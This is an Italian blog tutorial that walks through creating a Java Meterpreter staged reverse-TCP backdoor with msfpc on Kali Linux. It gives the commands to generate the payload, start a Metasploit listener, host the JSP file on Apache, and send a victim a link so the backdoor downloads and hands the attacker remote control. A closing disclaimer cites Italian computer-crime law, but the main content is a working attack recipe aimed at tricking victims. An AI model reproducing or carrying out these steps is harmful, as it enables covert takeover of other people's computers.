
Creare java-meterpreter-staged-reverse-tcp backdoor
Ciao ragazzi, oggi, in questo articolo, andremo a parlare dei metodi che ci serviranno per creare java-meterpreter-staged-reverse-tcp backdoor; come avete ben notato anche nei precedenti articoli ho spiegato come creare backdoor simili a quella in questione; il tutto è dovuto al fatto che adopereremo per un altro po’ di tempo un importante tool di Kali Linux, ovvero Msfvenom Payload Creator, che a mio parere permette di creare backdoor molto sofisticate e soprattutto molto efficienti. Se volete potete anche leggere gli articoli su come creare bash-shell-staged-reverse-tcp backdoor e come creare linux-shell-staged-bind-tcp backdoor. Aggiungo, inoltre, che il metodo d’attacco è pressoché identico a quello analizzato nei tutorial precedenti; la vittima dovrà cliccare su un link infetto che prepareremo; in tal modo si avvierà un download automatico che scaricherà sul PC malcapitato il file virus, che, una volta startato, ci permetterà di prendere il controllo sulla macchina remota. Entriamo quindi nel dettaglio.
Il primo passo sarà quello di aprire Msfvenom Payload Creator; lo potete trovare andando in Applicazioni>Strumenti di Exploiting>msf Payload Creator.
Di seguito, una volta startato il programma, digitate sul terminale il comando “/usr/bin/msfpc verbose loop [vostro indirizzo IP]”;
Se non sapete come ricavare il vostro indirizzo IP basterà digitare su di un nuovo terminale il comando “ifconfig”.
Molto bene, ora procediamo digitando il comando:
msfconsole -q -r ‘/root/java-meterpreter-staged-reverse-tcp-443-jsp.rc’
Dopo questo passaggio noterete che si attiverà la msfconsole di Metasploit Framework che si metterà in ascolto.
Ora andate nella Home; di sicuro avete fatto caso alla presenza di tutti quei file che prima non c’erano; si tratta delle backdoor pronte all’utilizzo che abbiamo creato con il precedente comando “/usr/bin/msfpc verbose loop [vostro indirizzo IP]”. Di questi file, tuttavia, solo uno sarà necessario per portare a termine il nostro attacco; più precisamente sto parlando del file “java-meterpreter-staged-reverse-tcp-443.jsp”.
A questo punto trasferiamo questo file nel percorso computer>var>www>html.
Fatto ciò possiamo aprire un nuovo terminale e digitare il comando “service apache2 start”.
Adesso non rimarrà altro che creare un link strutturato in questa maniera: [nostro indirizzo IP]/java-meterpreter-staged-reverse-tcp-443.jsp
Al posto di “[nostro indirizzo IP]” inseriremo l’IP che abbiamo ricavato già recentemente con il comando “ifconfig”.
Ottimo, una volta che la vittima cliccherà sul link, si avvierà un download automatico della backdoor sul suo PC e una volta che essa verrà aperta, il terminale di Metasploit Framework in ascolto rileverà la sua presenza sul target e stabilirà una connessione segreta con il computer sotto attacco, il quale potremo ampiamente comandare a distanza.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Leggete anche il nostro articolo Creare bash-shell-staged-reverse-tcp backdoor.
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI